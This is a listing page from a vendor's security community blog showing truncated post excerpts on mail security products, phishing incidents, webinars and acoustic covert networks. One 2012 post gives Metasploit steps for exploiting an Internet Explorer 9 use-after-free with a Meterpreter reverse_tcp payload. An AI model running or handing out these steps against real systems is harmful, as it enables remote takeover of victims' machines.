Video Screencast Help
Symantec to Separate Into Two Focused, Industry-Leading Technology Companies. Learn more.
Security Community Blog
Showing posts tagged with Mail Security for Exchange/Domino
Showing posts in English
captain jack sparrow | 03 Dec 2013 | 0 comments

can transmit information between computers using high-frequency sound waves inaudible to the human ear. The duo successfully sent passwords and more between non-networked Lenovo T400 laptops via the notebooks’ built-in microphones and speakers. Freaky-deaky!
The infected victim sends all recorded keystrokes to the covert acoustical mesh network. Infected drones forward the keystroke information inside the covert network till the attacker is reached.


kishorilal1986 | 17 Feb 2013 | 1 comment

Dear All,

As day by day security threat are increasing  and u need to more proactive approach to find latest details and make security tighten. As hackers group are continously working to break out security measures but at the same time organization spending lots of resource and money to make bussiness smooth and secure.

I think this is not just spending the money on IT security and having securty experts. makes u secure by implementing the security solutions. It is equally important to you how intellegently and smartly you take care each sides of security threats and configure it accordingly.

Please also read below threads for getting updates on some recent security threats

  • Shamoon virus targets energy sector infrastructure


pauldchavez | 03 Dec 2012 | 0 comments

Symantec would like to announce the general availability of Symantec Mail Security for Microsoft Exchange v7.0 (SMSMSE 7.0). Microsoft Exchange continues to be the leading application used for business communication across email and organizations must protect this environment from email-born threats and the loss of sensitive data. Symantec Mail Security for Microsoft Exchange v7.0 fully supports the latest Microsoft Exchange versions to maximize protection.

Summary of New Features:

• Support for Microsoft Exchange 2013 and Microsoft®Hosted Exchange environments

• Out-of-the-box content filtering templates for protection against data loss

• Improved anti-malware and anti-spam effectiveness through advanced heuristics

• Improved manageability with full message quarantine

• Up to 30 percent performance improvement for mailbox scanning

• Microsoft® Systems Center Operation Manager 2007 R2 support for...

Pritesh J. Chauhan | 11 Oct 2012 | 0 comments

Over the last few weeks we have been working with a number of customers who have large administrative overheads when protecting their IT Infrastructure.

When selecting a new service they have either gone to tender or bought an off the shelf solution upon recommendation from colleagues/friends. 

Whilst this may seem great at first, over the years this has built up a number of systems each requiring their own management systems, portals, update systems and most importantly, they lack integration between solutions. Whilst this may seem like a large problem, it gets worse - the issue with these customers was that they had multiple products performing conflicting tasks. 

One example from a customer who had one product that is designed to AV scan contents of a USB pen drive upon connection to the machine. Another product to encrypt USB pen drives upon connection. This is great if the admin could enforce this order, but what was actually happening is...

Matthew R. Ellison | 10 Oct 2012 | 0 comments

This blog continues from Part One.

Firstly we looked at how the email got through in the first place. The technique of an email coming from one place, but appearing to come from another is known as spoofing. Often in larger organisations it is quite normal to have third party applications or companies who legitimately spoof email – Marketing, HR, Cloud based application vendors and many more.

This is what had happened here, some issues with an external vendor had caused them to turn off the Content Control rule to allow spoofed email to be delivered. Of course what should have happened is for an exception to be created for that particular sender. It was only a temporary change during testing, but had never been fixed (I am not going to comment here on their testing processes).

That was easy...

Matthew R. Ellison | 10 Oct 2012 | 0 comments

Over the past couple of weeks we have been working very closely with a customer who was the victim of a phishing scam. Specifically it was a whale phishing (or whaling) technique, a type of spear phishing attack that is directly targeted at senior individuals within an organisation. (The opposite of Whale Phishing is Minnow Phishing or Minnowing where the attack is specifically directed at the apparently less significant members of a company such as receptionists or call centre workers – as seen in the recent Norton & Yahoo Cybergeddon movie)

Phishing is a fascinating area of security as it typically relies on our humanity (or you can read that as stupidity) to be successful. I see this with family members who quite happily delete emails from banks they don’t have accounts with, yet contact me to ask whether ‘this...

Fabiano.Pessoa | 27 Sep 2012 | 0 comments

We got a discovered vulnerability in IE 9 on 17/09/2012 which can be exploited as following command in Backtrack 5 R2


- msfupdate
- Use exploit / windows / browser / ie_execcommand_uaf
- Set SRVHOST 192,168 ...
- Set PAYLOAD windows / Meterpreter / reverse_tcp
- Set LHOST 192,168 ...
- exploit

Let's beware the networking.


Jhildy11 Xcend Group | 14 Aug 2012 | 0 comments

In case you missed it, see the archived version from last weeks webinar " Learn How to Protect Even Your Hardest-to-Find IP with Intelligent Data Loss Prevention"

With the average cost of a breach now topping an incomprehensible $7 million, more and more organizations are looking to Data Loss Prevention solutions to protect their highest value data. Join XCEND, a Platinum Symantec partner and DLP Master Specialist, to learn how you can accurately detect and protect all types of confidential data wherever it is stored or used.  (54 min)
Here's the Link to see the Archived Version: or go to our website at  to see all of the archived,...
pauldchavez | 12 Jul 2012 | 0 comments

Time: 8:30 am, Pacific Daylight Time (San Francisco, GMT-07:00)
Meeting Number: 598 795 263
Meeting Password: smsmse7

In preparation for the Symantec Mail Security for Microsoft Exchange 7.0 Beta, our Engineering team would like to invite you to a sneak preview of all the exciting new features that are integrated with SMSMSE7.0. Quality is our number one goal and we would like your help to ensure SMSMSE 7.0 is as high a quality release as possible. The Beta program will start on July 30th, 2012. For any queries please contact us at To register for the Beta please go to the following:

Highlights of this release

  1. ...
Pamela Reese | 25 Apr 2012 | 0 comments holds a monthly reader's poll to discover which product is preferred by Exchange administrators in a particular category or third-party solutions for Microsoft Exchange Server. March's polling topic was Exchange AntiVirus and Symantec Mail Security earned the top spot with 19% of the popular vote.

"Our Readers' Choice Awards give visitors to our site the opportunity to vote for the products they view as the very best in their respective category" - said Sean Buttigieg, manager. " users are specialists in their field who encounter various solutions for Exchange Server at the workplace. Their vote serves as a solid peer-to-peer recommendation of the winning product." is a Microsoft Exchange Server 2010/2007/2003 resource site that attracts ...